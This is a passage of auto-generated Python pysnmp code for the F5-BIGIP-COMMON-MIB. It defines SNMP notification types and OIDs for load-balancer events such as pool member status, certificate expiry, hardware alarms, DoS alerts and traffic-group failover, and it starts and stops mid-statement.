47)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLinkEnabled.setStatus('current') bigipGtmWideIpAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 48)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpAvail.setStatus('current') bigipGtmWideIpNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 49)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpNotAvail.setStatus('current') bigipGtmWideIpDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 50)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpDisabled.setStatus('current') bigipGtmWideIpEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 51)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmWideIpEnabled.setStatus('current') bigipGtmPoolMbrAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 52)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrAvail.setStatus('current') bigipGtmPoolMbrNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 53)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrNotAvail.setStatus('current') bigipGtmPoolMbrDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 54)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrDisabled.setStatus('current') bigipGtmPoolMbrEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 55)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmPoolMbrEnabled.setStatus('current') bigipGtmServerAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 56)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerAvail.setStatus('current') bigipGtmServerNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 57)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerNotAvail.setStatus('current') bigipGtmServerDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 58)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerDisabled.setStatus('current') bigipGtmServerEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 59)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmServerEnabled.setStatus('current') bigipGtmVsAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 60)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsAvail.setStatus('current') bigipGtmVsNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 61)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsNotAvail.setStatus('current') bigipGtmVsDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 62)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsDisabled.setStatus('current') bigipGtmVsEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 63)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmVsEnabled.setStatus('current') bigipGtmDcAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 64)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcAvail.setStatus('current') bigipGtmDcNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 65)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcNotAvail.setStatus('current') bigipGtmDcDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 66)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcDisabled.setStatus('current') bigipGtmDcEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 67)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmDcEnabled.setStatus('current') bigipHardDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 68)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipHardDiskFailure.setStatus('deprecated') bigipGtmAppObjAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 69)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppObjAvail.setStatus('current') bigipGtmAppObjNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 70)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppObjNotAvail.setStatus('current') bigipGtmAppAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 71)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppAvail.setStatus('current') bigipGtmAppNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 72)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmAppNotAvail.setStatus('current') bigipGtmJoinedGroup = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 73)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmJoinedGroup.setStatus('current') bigipGtmLeftGroup = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 74)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmLeftGroup.setStatus('current') bigipStandByFail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 75)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipStandByFail.setStatus('current') bigipInetPortExhaustion = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 76)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipInetPortExhaustion.setStatus('current') bigipGtmBoxAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 77)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBoxAvail.setStatus('current') bigipGtmBoxNotAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 78)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBoxNotAvail.setStatus('current') bigipAsmFtpRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 79)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmFtpRequestBlocked.setStatus('current') bigipAsmFtpRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 80)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmFtpRequestViolation.setStatus('current') bigipGtmBig3dSslCertExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 81)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBig3dSslCertExpired.setStatus('current') bigipGtmBig3dSslCertWillExpire = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 82)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmBig3dSslCertWillExpire.setStatus('current') bigipGtmSslCertExpired = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 83)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmSslCertExpired.setStatus('current') bigipGtmSslCertWillExpire = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 84)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmSslCertWillExpire.setStatus('current') bigipAsmSmtpRequestBlocked = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 85)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmSmtpRequestBlocked.setStatus('current') bigipAsmSmtpRequestViolation = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 86)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmSmtpRequestViolation.setStatus('current') bigipBladeTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 87)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeTempHigh.setStatus('current') bigipBladeNoPower = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 88)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeNoPower.setStatus('current') bigipClusterdNoResponse = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 89)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipClusterdNoResponse.setStatus('current') bigipBladeOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 90)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipBladeOffline.setStatus('current') bigipAsmDosAttackDetected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 91)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmDosAttackDetected.setStatus('current') bigipAsmBruteForceAttackDetected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 92)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAsmBruteForceAttackDetected.setStatus('current') bigipAomCpuTempTooHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 93)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAomCpuTempTooHigh.setStatus('current') bigipGtmKeyGenerationRollover = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 94)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmKeyGenerationRollover.setStatus('current') bigipGtmKeyGenerationExpiration = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 95)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmKeyGenerationExpiration.setStatus('current') bigipRaidDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 96)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipRaidDiskFailure.setStatus('current') bigipGtmProberPoolStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 97)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolStatusChange.setStatus('current') bigipGtmProberPoolStatusChangeReason = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 98)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolStatusChangeReason.setStatus('current') bigipGtmProberPoolDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 99)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolDisabled.setStatus('current') bigipGtmProberPoolEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 100)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolEnabled.setStatus('current') bigipGtmProberPoolMbrStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 101)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrStatusChange.setStatus('current') bigipGtmProberPoolMbrStatusChangeReason = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 102)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrStatusChangeReason.setStatus('current') bigipGtmProberPoolMbrDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 103)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrDisabled.setStatus('current') bigipGtmProberPoolMbrEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 104)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmProberPoolMbrEnabled.setStatus('current') bigipAvrAlertsMetricSnmp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 105)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAvrAlertsMetricSnmp.setStatus('current') bigipAvrAlertsMetricSmtp = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 106)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipAvrAlertsMetricSmtp.setStatus('deprecated') bigipVcmpAlertsVcmpPowerOn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 107)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpPowerOn.setStatus('current') bigipVcmpAlertsVcmpPowerOff = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 108)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpPowerOff.setStatus('current') bigipVcmpAlertsVcmpHBLost = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 109)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpHBLost.setStatus('current') bigipVcmpAlertsVcmpHBDetected = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 110)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVcmpAlertsVcmpHBDetected.setStatus('current') bigipSsdMwiNearThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 111)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSsdMwiNearThreshold.setStatus('current') bigipSsdMwiReachedThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 112)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSsdMwiReachedThreshold.setStatus('current') bigipSystemCheckAlertTempHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 113)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertTempHigh.setStatus('current') bigipSystemCheckAlertVoltageHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 114)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertVoltageHigh.setStatus('current') bigipSystemCheckAlertFanSpeedLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 115)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertFanSpeedLow.setStatus('current') bigipLibhalSsdPhysicalDiskRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 116)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSsdPhysicalDiskRemoved.setStatus('current') bigipLibhalSsdLogicalDiskRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 117)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSsdLogicalDiskRemoved.setStatus('current') bigipLibhalDiskBayRemoved = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 118)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalDiskBayRemoved.setStatus('current') bigipLibhalBladePoweredOff = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 119)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalBladePoweredOff.setStatus('current') bigipLibhalSensorAlarmCritical = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 120)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLibhalSensorAlarmCritical.setStatus('current') bigipChmandAlertFanTrayBad = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 121)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipChmandAlertFanTrayBad.setStatus('current') bigipUnsolicitedRepliesExceededThreshold = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 122)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUnsolicitedRepliesExceededThreshold.setStatus('current') bigipSystemCheckAlertVoltageLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 123)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertVoltageLow.setStatus('current') bigipSystemCheckAlertMilliVoltageHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 124)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertMilliVoltageHigh.setStatus('current') bigipSystemCheckAlertCurrentHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 125)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertCurrentHigh.setStatus('current') bigipSystemCheckAlertPowerHigh = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 126)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertPowerHigh.setStatus('current') bigipSystemCheckAlertMilliVoltageLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 127)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertMilliVoltageLow.setStatus('current') bigipSystemCheckAlertCurrentLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 128)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertCurrentLow.setStatus('current') bigipSystemCheckAlertPowerLow = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 129)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemCheckAlertPowerLow.setStatus('current') bigipNodeRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 130)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipNodeRate.setStatus('current') bigipMemberRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 131)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipMemberRate.setStatus('current') bigipVirtualRate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 132)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipVirtualRate.setStatus('current') bigipDosAttackStart = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 133)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDosAttackStart.setStatus('current') bigipDosAttackStop = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 134)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDosAttackStop.setStatus('current') bigipLtmVsAvail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 135)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsAvail.setStatus('current') bigipLtmVsUnavail = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 136)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsUnavail.setStatus('current') bigipLtmVsEnabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 137)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsEnabled.setStatus('current') bigipLtmVsDisabled = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 138)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipLtmVsDisabled.setStatus('current') bigipDnsRequestRateLimiterEngaged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 139)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipDnsRequestRateLimiterEngaged.setStatus('current') bigipGtmRequestRateLimiterEngaged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 140)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipGtmRequestRateLimiterEngaged.setStatus('current') bigipTrafficGroupStandby = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 141)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupStandby.setStatus('current') bigipTrafficGroupActive = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 142)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupActive.setStatus('current') bigipTrafficGroupOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 143)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupOffline.setStatus('current') bigipTrafficGroupForcedOffline = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 144)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupForcedOffline.setStatus('current') bigipTrafficGroupDeactivate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 145)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupDeactivate.setStatus('current') bigipTrafficGroupActivate = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 146)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipTrafficGroupActivate.setStatus('current') bigipPsPowerOn = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 147)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsPowerOn.setStatus('current') bigipPsPowerOff = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 148)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsPowerOff.setStatus('current') bigipPsAbsent = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 149)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipPsAbsent.setStatus('current') bigipClusterPrimaryChanged = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 150)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipClusterPrimaryChanged.setStatus('current') bigipSystemShutdown = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 151)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipSystemShutdown.setStatus('current') bigipFipsDeviceError = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 152)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFipsDeviceError.setStatus('current') bigipUpdatePriority = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 153)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdatePriority.setStatus('current') bigipUpdateServer = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 154)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdateServer.setStatus('current') bigipUpdateError = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 155)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipUpdateError.setStatus('current') bigipFipsFault = NotificationType((1, 3, 6, 1, 4, 1, 3375, 2, 4, 0, 156)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg")) if mibBuilder.loadTexts: bigipFipsFault.setStatus('current') bigipNotificationCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 3375, 2, 5, 1, 4)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjectsGroup"), ("F5-BIGIP-COMMON-MIB", "bigipAgentNotifyGroup")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipNotificationCompliance = bigipNotificationCompliance.setStatus('current') bigipNotifyObjectsGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 1)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipNotifyObjMsg"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjNode"), ("F5-BIGIP-COMMON-MIB", "bigipNotifyObjPort")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipNotifyObjectsGroup = bigipNotifyObjectsGroup.setStatus('current') bigipAgentNotifyGroup = NotificationGroup((1, 3, 6, 1, 4, 1, 3375, 2, 5, 2, 4, 2)).setObjects(("F5-BIGIP-COMMON-MIB", "bigipAgentStart"), ("F5-BIGIP-COMMON-MIB", "bigipAgentShutdown"), ("F5-BIGIP-COMMON-MIB", "bigipAgentRestart")) if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0): bigipAgentNotifyGroup = 